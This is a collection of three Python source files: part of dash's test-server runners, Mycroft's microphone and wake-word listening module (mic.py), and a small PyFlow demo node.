self.started = self.thread.is_alive()
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=1)
def stop(self):
requests.get("{}{}".format(self.url, self.stop_route))
wait.until_not(self.thread.is_alive, self.stop_timeout)
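# Hedged usage sketch (not taken from dash's docs): the runners are context
# managers, so an integration test can do roughly:
#   with ThreadedRunner() as runner:
#       runner.start(app, port=8050)  # `app` is a dash.Dash instance
#       ...                           # exercise the app at runner.url
#   # leaving the block stops the server unless keep_open=True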
class ProcessRunner(BaseDashRunner):
"""Runs a dash application in a waitress-serve subprocess.
This flavor is closer to production environment but slower.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.proc = None
# pylint: disable=arguments-differ
def start(
self,
app_module=None,
application_name="app",
raw_command=None,
port=8050,
start_timeout=3,
):
"""Start the server with waitress-serve in process flavor."""
if not (app_module or raw_command): # need to set a least one
logging.error(
"the process runner needs to start with at least one valid command"
)
return
self.port = port
args = shlex.split(
raw_command
if raw_command
else "waitress-serve --listen=0.0.0.0:{} {}:{}.server".format(
port, app_module, application_name
),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen( # pylint: disable=consider-using-with
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=start_timeout)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
self.stop()
return
self.started = True
def stop(self):
if self.proc:
try:
logger.info("proc.terminate with pid %s", self.proc.pid)
self.proc.terminate()
if self.tmp_app_path and os.path.exists(self.tmp_app_path):
logger.debug("removing temporary app path %s", self.tmp_app_path)
shutil.rmtree(self.tmp_app_path)
_except = subprocess.TimeoutExpired # pylint:disable=no-member
self.proc.communicate(
timeout=self.stop_timeout # pylint: disable=unexpected-keyword-arg
)
except _except:
logger.exception(
"subprocess terminate not success, trying to kill "
"the subprocess in a safe manner"
)
self.proc.kill()
self.proc.communicate()
logger.info("process stop completes!")
class RRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app, start_timeout=2, cwd=None):
"""Start the server with subprocess and Rscript."""
if os.path.isfile(app) and os.path.exists(app):
# app is already a file in a dir - use that as cwd
if not cwd:
cwd = os.path.dirname(app)
logger.info("RRunner inferred cwd from app path: %s", cwd)
else:
# app is a string chunk, we make a temporary folder to store app.R
# and its relevant assets
self._tmp_app_path = os.path.join(
"/tmp" if not self.is_windows else os.getenv("TEMP"), uuid.uuid4().hex
)
try:
os.mkdir(self.tmp_app_path)
except OSError:
logger.exception("cannot make temporary folder %s", self.tmp_app_path)
path = os.path.join(self.tmp_app_path, "app.R")
logger.info("RRunner start => app is R code chunk")
logger.info("make a temporary R file for execution => %s", path)
logger.debug("content of the dashR app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
# try to find the path to the calling script to use as cwd
if not cwd:
for entry in inspect.stack():
if "/dash/testing/" not in entry[1].replace("\\", "/"):
cwd = os.path.dirname(os.path.realpath(entry[1]))
logger.warning("get cwd from inspect => %s", cwd)
break
if cwd:
logger.info("RRunner inferred cwd from the Python call stack: %s", cwd)
# try copying all valid sub folders (i.e. assets) in cwd to tmp
# note that the R assets folder name can be any valid folder name
assets = [
os.path.join(cwd, _)
for _ in os.listdir(cwd)
if not _.startswith("__") and os.path.isdir(os.path.join(cwd, _))
]
for asset in assets:
target = os.path.join(self.tmp_app_path, os.path.basename(asset))
if os.path.exists(target):
logger.debug("delete existing target %s", target)
shutil.rmtree(target)
logger.debug("copying %s => %s", asset, self.tmp_app_path)
shutil.copytree(asset, target)
logger.debug("copied with %s", os.listdir(target))
else:
logger.warning(
"RRunner found no cwd in the Python call stack. "
"You may wish to specify an explicit working directory "
"using something like: "
"dashr.run_server(app, cwd=os.path.dirname(__file__))"
)
logger.info("Run dashR app with Rscript => %s", app)
args = shlex.split(
"Rscript -e 'source(\"{}\")'".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen( # pylint: disable=consider-using-with
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.tmp_app_path if self.tmp_app_path else cwd,
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=start_timeout)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
class JuliaRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app, start_timeout=30, cwd=None):
"""Start the server with subprocess and julia."""
if os.path.isfile(app) and os.path.exists(app):
# app is already a file in a dir - use that as cwd
if not cwd:
cwd = os.path.dirname(app)
logger.info("JuliaRunner inferred cwd from app path: %s", cwd)
else:
# app is a string chunk, we make a temporary folder to store app.jl
# and its relevant assets
self._tmp_app_path = os.path.join(
"/tmp" if not self.is_windows else os.getenv("TEMP"), uuid.uuid4().hex
)
try:
os.mkdir(self.tmp_app_path)
except OSError:
logger.exception("cannot make temporary folder %s", self.tmp_app_path)
path = os.path.join(self.tmp_app_path, "app.jl")
logger.info("JuliaRunner start => app is Julia code chunk")
logger.info("make a temporary Julia file for execution => %s", path)
logger.debug("content of the Dash.jl app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
# try to find the path to the calling script to use as cwd
if not cwd:
for entry in inspect.stack():
if "/dash/testing/" not in entry[1].replace("\\", "/"):
cwd = os.path.dirname(os.path.realpath(entry[1]))
logger.warning("get cwd from inspect => %s", cwd)
break
if cwd:
logger.info(
"JuliaRunner inferred cwd from the Python call stack: %s", cwd
)
# try copying all valid sub folders (i.e. assets) in cwd to tmp
                # note that the Julia assets folder name can be any valid folder name
assets = [
os.path.join(cwd, _)
for _ in os.listdir(cwd)
if not _.startswith("__") and os.path.isdir(os.path.join(cwd, _))
]
for asset in assets:
target = os.path.join(self.tmp_app_path, os.path.basename(asset))
if os.path.exists(target):
logger.debug("delete existing target %s", target)
shutil.rmtree(target)
logger.debug("copying %s => %s", asset, self.tmp_app_path)
shutil.copytree(asset, target)
logger.debug("copied with %s", os.listdir(target))
else:
logger.warning(
"JuliaRunner found no cwd in the Python call stack. "
"You may wish to specify an explicit working directory "
"using something like: "
"dashjl.run_server(app, cwd=os.path.dirname(__file__))"
)
logger.info("Run Dash.jl app with julia => %s", app)
args = shlex.split(
"julia {}".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start Dash.jl process with %s", args)
try:
self.proc = subprocess.Popen( # pylint: disable=consider-using-with
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.tmp_app_path if self.tmp_app_path else cwd,
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=start_timeout)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
|
mic.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import audioop
from time import sleep, time as get_time
from collections import deque, namedtuple
from datetime import date, timedelta, datetime
import json
import os
from os.path import isdir, join
import pyaudio
import requests
import speech_recognition
from hashlib import md5
from io import BytesIO, StringIO
from speech_recognition import (
Microphone,
AudioSource,
AudioData
)
from tempfile import gettempdir
from threading import Thread, Lock
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util import (
check_for_signal,
get_ipc_directory,
resolve_resource_file,
play_wav
)
from mycroft.util.log import LOG
from .data_structures import RollingMean, CyclicAudioBuffer
WakeWordData = namedtuple('WakeWordData',
['audio', 'found', 'stopped', 'end_audio'])
class MutableStream:
def __init__(self, wrapped_stream, format, muted=False):
assert wrapped_stream is not None
self.wrapped_stream = wrapped_stream
self.SAMPLE_WIDTH = pyaudio.get_sample_size(format)
self.muted_buffer = b''.join([b'\x00' * self.SAMPLE_WIDTH])
self.read_lock = Lock()
self.muted = muted
if muted:
self.mute()
def mute(self):
"""Stop the stream and set the muted flag."""
with self.read_lock:
self.muted = True
self.wrapped_stream.stop_stream()
def unmute(self):
"""Start the stream and clear the muted flag."""
with self.read_lock:
self.muted = False
self.wrapped_stream.start_stream()
def read(self, size, of_exc=False):
"""Read data from stream.
Args:
size (int): Number of bytes to read
of_exc (bool): flag determining if the audio producer thread
should throw IOError at overflows.
Returns:
(bytes) Data read from device
"""
frames = deque()
remaining = size
with self.read_lock:
while remaining > 0:
# If muted during read return empty buffer. This ensures no
# reads occur while the stream is stopped
if self.muted:
return self.muted_buffer
to_read = min(self.wrapped_stream.get_read_available(),
remaining)
if to_read <= 0:
sleep(.01)
continue
result = self.wrapped_stream.read(to_read,
exception_on_overflow=of_exc)
frames.append(result)
remaining -= to_read
input_latency = self.wrapped_stream.get_input_latency()
if input_latency > 0.2:
LOG.warning("High input latency: %f" % input_latency)
audio = b"".join(list(frames))
return audio
def close(self):
self.wrapped_stream.close()
self.wrapped_stream = None
def is_stopped(self):
try:
return self.wrapped_stream.is_stopped()
except Exception as e:
LOG.error(repr(e))
            return True  # Assume the stream has been closed and thus stopped
def stop_stream(self):
return self.wrapped_stream.stop_stream()
class MutableMicrophone(Microphone):
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024,
mute=False):
Microphone.__init__(self, device_index=device_index,
sample_rate=sample_rate, chunk_size=chunk_size)
self.muted = False
if mute:
self.mute()
def __enter__(self):
return self._start()
def _start(self):
"""Open the selected device and setup the stream."""
assert self.stream is None, \
"This audio source is already inside a context manager"
self.audio = pyaudio.PyAudio()
self.stream = MutableStream(self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE,
frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
), self.format, self.muted)
return self
def __exit__(self, exc_type, exc_value, traceback):
return self._stop()
def _stop(self):
"""Stop and close an open stream."""
try:
if not self.stream.is_stopped():
self.stream.stop_stream()
self.stream.close()
except Exception:
LOG.exception('Failed to stop mic input stream')
# Let's pretend nothing is wrong...
self.stream = None
self.audio.terminate()
def restart(self):
"""Shutdown input device and restart."""
self._stop()
self._start()
def mute(self):
self.muted = True
if self.stream:
self.stream.mute()
def unmute(self):
self.muted = False
if self.stream:
self.stream.unmute()
def is_muted(self):
return self.muted
def duration_to_bytes(self, sec):
"""Converts a duration in seconds to number of recorded bytes.
Args:
sec: number of seconds
Returns:
(int) equivalent number of bytes recorded by this Mic
"""
return int(sec * self.SAMPLE_RATE) * self.SAMPLE_WIDTH
def get_silence(num_bytes):
return b'\0' * num_bytes
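# --- Editorial sketch (not part of the original module) -----------------------
# A worked example of the buffer arithmetic used below, assuming the defaults
# in this file: a 16 kHz sample rate, 2-byte (16-bit) samples and a 1024-sample
# chunk. It only restates the formulas in MutableMicrophone.duration_to_bytes
# and ResponsiveRecognizer.listen.
def _example_buffer_arithmetic(sample_rate=16000, sample_width=2, chunk=1024):
    sec_per_buffer = float(chunk) / sample_rate                 # 0.064 s per chunk
    half_second_bytes = int(0.5 * sample_rate) * sample_width   # 16000 bytes
    return sec_per_buffer, half_second_bytes
# ------------------------------------------------------------------------------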
class NoiseTracker:
"""Noise tracker, used to deterimine if an audio utterance is complete.
The current implementation expects a number of loud chunks (not necessary
in one continous sequence) followed by a short period of continous quiet
audio data to be considered complete.
Args:
minimum (int): lower noise level, used as the threshold for the "quiet" level
maximum (int): ceiling of the noise level
sec_per_buffer (float): the length in seconds of each buffer used when
updating the tracker
loud_time_limit (float): time in seconds of loud audio required before a
sentence can be considered complete
silence_time_limit (float): time limit for silence before the sentence is
aborted
silence_after_loud_time (float): time of silence needed to finalize the
sentence. Default 0.25 seconds.
"""
def __init__(self, minimum, maximum, sec_per_buffer, loud_time_limit,
silence_time_limit, silence_after_loud_time=0.25):
self.min_level = minimum
self.max_level = maximum
self.sec_per_buffer = sec_per_buffer
self.num_loud_chunks = 0
self.level = 0
# Smallest number of loud chunks required to return loud enough
self.min_loud_chunks = int(loud_time_limit / sec_per_buffer)
self.max_silence_duration = silence_time_limit
self.silence_duration = 0
# time of quiet period after long enough loud data to consider the
# sentence complete
self.silence_after_loud = silence_after_loud_time
# Constants
self.increase_multiplier = 200
self.decrease_multiplier = 100
def _increase_noise(self):
"""Bumps the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level < self.max_level:
self.level += self.increase_multiplier * self.sec_per_buffer
def _decrease_noise(self):
"""Decrease the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level > self.min_level:
self.level -= self.decrease_multiplier * self.sec_per_buffer
def update(self, is_loud):
"""Update the tracking. with either a loud chunk or a quiet chunk.
Args:
is_loud: True if a loud chunk should be registered
False if a quiet chunk should be registered
"""
if is_loud:
self._increase_noise()
self.num_loud_chunks += 1
else:
self._decrease_noise()
# Update duration of energy under the threshold level
if self._quiet_enough():
self.silence_duration += self.sec_per_buffer
else: # Reset silence duration
self.silence_duration = 0
def _loud_enough(self):
"""Check if the noise loudness criteria is fulfilled.
The noise is considered loud enough if it's been over the threshold
for a certain number of chunks (accumulated, not in a row).
"""
return self.num_loud_chunks > self.min_loud_chunks
def _quiet_enough(self):
"""Check if the noise quietness criteria is fulfilled.
The quiet level is instant and will return True if the level is lower
or equal to the minimum noise level.
"""
return self.level <= self.min_level
def recording_complete(self):
"""Has the end creteria for the recording been met.
If the noise level has decresed from a loud level to a low level
the user has stopped speaking.
Alternatively if a lot of silence was recorded without detecting
a loud enough phrase.
"""
too_much_silence = (self.silence_duration > self.max_silence_duration)
if too_much_silence:
LOG.debug('Too much silence recorded without start of sentence '
'detected')
return ((self._quiet_enough() and
self.silence_duration > self.silence_after_loud) and
(self._loud_enough() or too_much_silence))
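# --- Editorial sketch (not part of the original module) -----------------------
# Illustrates how NoiseTracker is driven: feed it one boolean per audio chunk
# (loud or quiet) and poll recording_complete(). The numbers below mirror the
# values used in ResponsiveRecognizer._record_phrase (min level 0, max level
# 25, 0.5 s of loud audio, 3 s silence timeout) and are assumptions made only
# for this demo.
def _noise_tracker_demo(sec_per_buffer=0.064):
    tracker = NoiseTracker(0, 25, sec_per_buffer,
                           loud_time_limit=0.5, silence_time_limit=3.0)
    # Simulate ~1 second of speech followed by silence.
    for _ in range(int(1.0 / sec_per_buffer)):
        tracker.update(is_loud=True)
    chunks_of_silence = 0
    while not tracker.recording_complete():
        tracker.update(is_loud=False)
        chunks_of_silence += 1
    return chunks_of_silence * sec_per_buffer  # seconds of trailing silence
# ------------------------------------------------------------------------------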
class ResponsiveRecognizer(speech_recognition.Recognizer):
# Padding of silence when feeding to pocketsphinx
SILENCE_SEC = 0.01
# The minimum seconds of noise before a
# phrase can be considered complete
MIN_LOUD_SEC_PER_PHRASE = 0.5
# The minimum seconds of silence required at the end
# before a phrase will be considered complete
MIN_SILENCE_AT_END = 0.25
# Time between pocketsphinx checks for the wake word
SEC_BETWEEN_WW_CHECKS = 0.2
def __init__(self, wake_word_recognizer, watchdog=None):
self._watchdog = watchdog or (lambda: None) # Default to dummy func
self.config = Configuration.get()
listener_config = self.config.get('listener')
self.upload_url = listener_config['wake_word_upload']['url']
self.upload_disabled = listener_config['wake_word_upload']['disable']
self.wake_word_name = wake_word_recognizer.key_phrase
self.overflow_exc = listener_config.get('overflow_exception', False)
super().__init__()
self.wake_word_recognizer = wake_word_recognizer
self.audio = pyaudio.PyAudio()
self.multiplier = listener_config.get('multiplier')
self.energy_ratio = listener_config.get('energy_ratio')
# Check the config for the flag to save wake words, utterances
# and for a path under which to save them
self.save_utterances = listener_config.get('save_utterances', False)
self.save_wake_words = listener_config.get('record_wake_words', False)
self.save_path = listener_config.get('save_path', gettempdir())
self.saved_wake_words_dir = join(self.save_path, 'mycroft_wake_words')
if self.save_wake_words and not isdir(self.saved_wake_words_dir):
os.mkdir(self.saved_wake_words_dir)
self.saved_utterances_dir = join(self.save_path, 'mycroft_utterances')
if self.save_utterances and not isdir(self.saved_utterances_dir):
os.mkdir(self.saved_utterances_dir)
self.mic_level_file = os.path.join(get_ipc_directory(), "mic_level")
# Signal statuses
self._stop_signaled = False
self._listen_triggered = False
self._account_id = None
# The maximum seconds a phrase can be recorded,
# provided there is noise the entire time
self.recording_timeout = listener_config.get('recording_timeout',
10.0)
# The maximum time it will continue to record silence
# when not enough noise has been detected
self.recording_timeout_with_silence = listener_config.get(
'recording_timeout_with_silence', 3.0)
@property
def account_id(self):
"""Fetch account from backend when needed.
If an error occurs it's handled and a temporary value is returned.
When a value is received it will be cached until next start.
"""
if not self._account_id:
try:
self._account_id = DeviceApi().get()['user']['uuid']
except (requests.RequestException, AttributeError):
pass # These are expected and won't be reported
except Exception as e:
LOG.debug('Unhandled exception while determining device_id, '
'Error: {}'.format(repr(e)))
return self._account_id or '0'
def record_sound_chunk(self, source):
return source.stream.read(source.CHUNK, self.overflow_exc)
@staticmethod
def calc_energy(sound_chunk, sample_width):
return audioop.rms(sound_chunk, sample_width)
def _record_phrase(
self,
source,
sec_per_buffer,
stream=None,
ww_frames=None
):
"""Record an entire spoken phrase.
Essentially, this code waits for a period of silence and then returns
the audio. If silence isn't detected, it will terminate and return
a buffer of self.recording_timeout duration.
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded.
ww_frames (deque): Frames of audio data from the last part of wake
word detection.
Returns:
bytearray: complete audio buffer recorded, including any
silence at the end of the user's utterance
"""
noise_tracker = NoiseTracker(0, 25, sec_per_buffer,
self.MIN_LOUD_SEC_PER_PHRASE,
self.recording_timeout_with_silence)
# Maximum number of chunks to record before timing out
max_chunks = int(self.recording_timeout / sec_per_buffer)
num_chunks = 0
# bytearray to store audio in, initialized with a single sample of
# silence.
byte_data = get_silence(source.SAMPLE_WIDTH)
if stream:
stream.stream_start()
phrase_complete = False
while num_chunks < max_chunks and not phrase_complete:
if ww_frames:
chunk = ww_frames.popleft()
else:
chunk = self.record_sound_chunk(source)
byte_data += chunk
num_chunks += 1
if stream:
stream.stream_chunk(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
test_threshold = self.energy_threshold * self.multiplier
is_loud = energy > test_threshold
noise_tracker.update(is_loud)
if not is_loud:
self._adjust_threshold(energy, sec_per_buffer)
# The phrase is complete if the noise_tracker end of sentence
# criteria is met or if the top-button is pressed
phrase_complete = (noise_tracker.recording_complete() or
check_for_signal('buttonPress'))
# Periodically write the energy level to the mic level file.
if num_chunks % 10 == 0:
self._watchdog()
self.write_mic_level(energy, source)
return byte_data
def write_mic_level(self, energy, source):
with open(self.mic_level_file, 'w') as f:
f.write('Energy: cur={} thresh={:.3f} muted={}'.format(
energy,
self.energy_threshold,
int(source.muted)
)
)
def _skip_wake_word(self):
"""Check if told programatically to skip the wake word
For example when we are in a dialog with the user.
"""
if self._listen_triggered:
return True
# Pressing the Mark 1 button can start recording (unless
# it is being used to mean 'stop' instead)
if check_for_signal('buttonPress', 1):
# give other processes time to consume this signal if
# it was meant to be a 'stop'
sleep(0.25)
if check_for_signal('buttonPress'):
# Signal is still here, assume it was intended to
# begin recording
LOG.debug("Button Pressed, wakeword not needed")
return True
return False
def stop(self):
"""Signal stop and exit waiting state."""
self._stop_signaled = True
def _compile_metadata(self):
ww_module = self.wake_word_recognizer.__class__.__name__
if ww_module == 'PreciseHotword':
model_path = self.wake_word_recognizer.precise_model
with open(model_path, 'rb') as f:
model_hash = md5(f.read()).hexdigest()
else:
model_hash = '0'
return {
'name': self.wake_word_name.replace(' ', '-'),
'engine': md5(ww_module.encode('utf-8')).hexdigest(),
'time': str(int(1000 * get_time())),
'sessionId': SessionManager.get().session_id,
'accountId': self.account_id,
'model': str(model_hash)
}
def trigger_listen(self):
"""Externally trigger listening."""
LOG.debug('Listen triggered from external source.')
self._listen_triggered = True
def _upload_wakeword(self, audio, metadata):
"""Upload the wakeword in a background thread."""
LOG.debug(
"Wakeword uploading has been disabled. The API endpoint used in "
"Mycroft-core v20.2 and below has been deprecated. To contribute "
"new wakeword samples please upgrade to v20.8 or above."
)
# def upload(audio, metadata):
# requests.post(self.upload_url,
# files={'audio': BytesIO(audio.get_wav_data()),
# 'metadata': StringIO(json.dumps(metadata))})
# Thread(target=upload, daemon=True, args=(audio, metadata)).start()
def _send_wakeword_info(self, emitter):
"""Send messagebus message indicating that a wakeword was received.
Args:
emitter: bus emitter to send information on.
"""
SessionManager.touch()
payload = {'utterance': self.wake_word_name,
'session': SessionManager.get().session_id}
emitter.emit("recognizer_loop:wakeword", payload)
def _write_wakeword_to_disk(self, audio, metadata):
"""Write wakeword to disk.
Args:
audio: Audio data to write
metadata: List of metadata about the captured wakeword
"""
filename = join(self.saved_wake_words_dir,
'_'.join(str(metadata[k]) for k in sorted(metadata)) +
'.wav')
with open(filename, 'wb') as f:
f.write(audio.get_wav_data())
def _handle_wakeword_found(self, audio_data, source):
"""Perform actions to be triggered after a wakeword is found.
This includes: emit event on messagebus that a wakeword is heard,
store wakeword to disk if configured and sending the wakeword data
to the cloud in case the user has opted into the data sharing.
"""
# Save and upload positive wake words as appropriate
upload_allowed = (self.config['opt_in'] and not self.upload_disabled)
if (self.save_wake_words or upload_allowed):
audio = self._create_audio_data(audio_data, source)
metadata = self._compile_metadata()
if self.save_wake_words:
# Save wake word locally
self._write_wakeword_to_disk(audio, metadata)
# Upload wake word for opt_in people
if upload_allowed:
self._upload_wakeword(audio, metadata)
def _wait_until_wake_word(self, source, sec_per_buffer, emitter):
"""Listen continuously on source until a wake word is spoken
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
"""
#noise_tracker = NoiseTracker(0, 25, sec_per_buffer, self.MIN_LOUD_SEC_PER_PHRASE, self.recording_timeout_with_silence)
# The maximum audio in seconds to keep for transcribing a phrase
# The wake word must fit in this time
ww_duration = self.wake_word_recognizer.expected_duration
ww_test_duration = max(3, ww_duration)
mic_write_counter = 0
num_silent_bytes = int(self.SILENCE_SEC * source.SAMPLE_RATE *
source.SAMPLE_WIDTH)
silence = get_silence(num_silent_bytes)
# Max bytes for byte_data before audio is removed from the front
max_size = source.duration_to_bytes(ww_duration)
test_size = source.duration_to_bytes(ww_test_duration)
audio_buffer = CyclicAudioBuffer(max_size, silence)
buffers_per_check = self.SEC_BETWEEN_WW_CHECKS / sec_per_buffer
buffers_since_check = 0.0
# Rolling buffer to track the audio energy (loudness) heard on
# the source recently. An average audio energy is maintained
# based on these levels.
average_samples = int(5 / sec_per_buffer) # average over last 5 secs
audio_mean = RollingMean(average_samples)
# These are frames immediately after wake word is detected
# that we want to keep to send to STT
ww_frames = deque(maxlen=35)
energy = -1
said_wake_word = False
audio_data = None
noise_timer = datetime.now()
while energy < max(self.energy_threshold * 3, 200):
chunk = self.record_sound_chunk(source)
audio_buffer.append(chunk)
ww_frames.append(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
audio_mean.append_sample(energy)
current_time = datetime.now()
if audio_mean.value > 1000 and current_time > timedelta(seconds=5) + noise_timer:
noise_timer = current_time
emitter.emit("energy_level:too_high")
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
# maintain the threshold using average
if self.energy_threshold < energy < audio_mean.value * 1.5:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if mic_write_counter % 3:
self._watchdog()
self.write_mic_level(energy, source)
mic_write_counter += 1
buffers_since_check += 1.0
# Send chunk to wake_word_recognizer
self.wake_word_recognizer.update(chunk)
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
audio_data = audio_buffer.get_last(test_size) + silence
said_wake_word = \
self.wake_word_recognizer.found_wake_word(audio_data)
counter = 0
while (not said_wake_word and not self._stop_signaled and
not self._skip_wake_word() and counter < 35):
counter += 1
chunk = self.record_sound_chunk(source)
audio_buffer.append(chunk)
ww_frames.append(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
audio_mean.append_sample(energy)
current_time = datetime.now()
if audio_mean.value > 1000 and current_time > timedelta(seconds=5) + noise_timer:
noise_timer = current_time
emitter.emit("energy_level:too_high")
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
# maintain the threshold using average
if self.energy_threshold < energy < audio_mean.value * 1.5:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if mic_write_counter % 3:
self._watchdog()
self.write_mic_level(energy, source)
mic_write_counter += 1
buffers_since_check += 1.0
# Send chunk to wake_word_recognizer
self.wake_word_recognizer.update(chunk)
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
audio_data = audio_buffer.get_last(test_size) + silence
said_wake_word = \
self.wake_word_recognizer.found_wake_word(audio_data)
self._listen_triggered = False
return WakeWordData(audio_data, said_wake_word,
self._stop_signaled, ww_frames)
@staticmethod
def _create_audio_data(raw_data, source):
"""
Constructs an AudioData instance with the same parameters
as the source and the specified frame_data
"""
return AudioData(raw_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def mute_and_confirm_listening(self, source):
audio_file = resolve_resource_file(
self.config.get('sounds').get('start_listening'))
if audio_file:
source.mute()
play_wav(audio_file).wait()
source.unmute()
return True
else:
return False
def listen(self, source, emitter, stream=None):
"""Listens for chunks of audio that Mycroft should perform STT on.
This will listen continuously for a wake-up-word, then return the
audio chunk containing the spoken phrase that comes immediately
afterwards.
Args:
source (AudioSource): Source producing the audio chunks
emitter (EventEmitter): Emitter for notifications of when recording
begins and ends.
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded
Returns:
AudioData: audio with the user's utterance, minus the wake-up-word
"""
assert isinstance(source, AudioSource), "Source must be an AudioSource"
# bytes_per_sec = source.SAMPLE_RATE * source.SAMPLE_WIDTH
sec_per_buffer = float(source.CHUNK) / source.SAMPLE_RATE
# Every time a new 'listen()' request begins, reset the threshold
# used for silence detection. This is as good of a reset point as
# any, as we expect the user and Mycroft to not be talking.
# NOTE: adjust_for_ambient_noise() doc claims it will stop early if
# speech is detected, but there is no code to actually do that.
self.adjust_for_ambient_noise(source, 1.0)
LOG.debug("Waiting for wake word...")
ww_data = self._wait_until_wake_word(source, sec_per_buffer, emitter)
ww_frames = None  # ensure defined even if no wake word was detected
if ww_data.found:
# If the wakeword was heard send it
self._send_wakeword_info(emitter)
self._handle_wakeword_found(ww_data.audio, source)
ww_frames = ww_data.end_audio
if ww_data.stopped:
# If the waiting returned from a stop signal
return
LOG.debug("Recording...")
# If enabled, play a wave file with a short sound to audibly
# indicate recording has begun.
if ww_data.found and self.config.get('confirm_listening'):
if self.mute_and_confirm_listening(source):
# Clear frames from wakeword detections since they're
# irrelevant after the mute - play wav - unmute sequence
ww_frames = None
# Notify system of recording start
emitter.emit("recognizer_loop:record_begin")
frame_data = self._record_phrase(
source,
sec_per_buffer,
stream,
ww_frames
)
audio_data = self._create_audio_data(frame_data, source)
emitter.emit("recognizer_loop:record_end")
if self.save_utterances:
LOG.info("recording utterance")
stamp = str(datetime.now())
filename = join(self.saved_utterances_dir, "{}.wav".format(stamp))
with open(filename, 'wb') as filea:
filea.write(audio_data.get_wav_data())
LOG.debug("Thinking...")
return audio_data
def _adjust_threshold(self, energy, seconds_per_buffer):
if self.dynamic_energy_threshold and energy > 0:
# account for different chunk sizes and rates
damping = (
self.dynamic_energy_adjustment_damping ** seconds_per_buffer)
target_energy = energy * self.energy_ratio
self.energy_threshold = (
self.energy_threshold * damping +
target_energy * (1 - damping))
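# --- Editorial sketch (not part of the original module) -----------------------
# A worked example of the exponential smoothing in _adjust_threshold above.
# With dynamic_energy_adjustment_damping = 0.15 (the speech_recognition
# default) and a 0.064 s buffer, damping = 0.15 ** 0.064 ~= 0.886, so roughly
# 11% of the gap towards energy * energy_ratio is closed on every quiet chunk.
# The numbers below are assumptions used only to illustrate the formula.
def _example_threshold_update(threshold=300.0, energy=120.0, energy_ratio=1.5,
                              damping_base=0.15, seconds_per_buffer=0.064):
    damping = damping_base ** seconds_per_buffer
    target_energy = energy * energy_ratio
    return threshold * damping + target_energy * (1 - damping)
# ------------------------------------------------------------------------------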
|
ProcessObj.py
|
from PyFlow.Core import NodeBase
from PyFlow.Core.NodeBase import NodePinsSuggestionsHelper
from PyFlow.Core.Common import *
import threading
import time
class AnObject(NodeBase):
def __init__(self, name):
super(AnObject, self).__init__(name)
self.inExec = self.createInputPin("Start", 'ExecPin', None, self.start)
self.inExec = self.createInputPin("Stop", 'ExecPin', None, self.stop)
self.entity = self.createInputPin('WordsInput', 'StringPin', defaultValue="Speaker Loaded!",structure=StructureType.Multi)
self.brunning=False
thr=threading.Thread(target=self.work)
thr.start()
@staticmethod
def pinTypeHints():
helper = NodePinsSuggestionsHelper()
return helper
@staticmethod
def category():
return 'Tests'
def start(self, *args, **kwargs):
self.brunning = True
def stop(self, *args, **kwargs):
self.brunning = False
def work(self, *args, **kwargs):
while True:
time.sleep(1)
if self.brunning == False:
continue
if self.entity.getData() !="":
print("your object is working ...")
print("text is -> {}".format(self.entity.getData()))
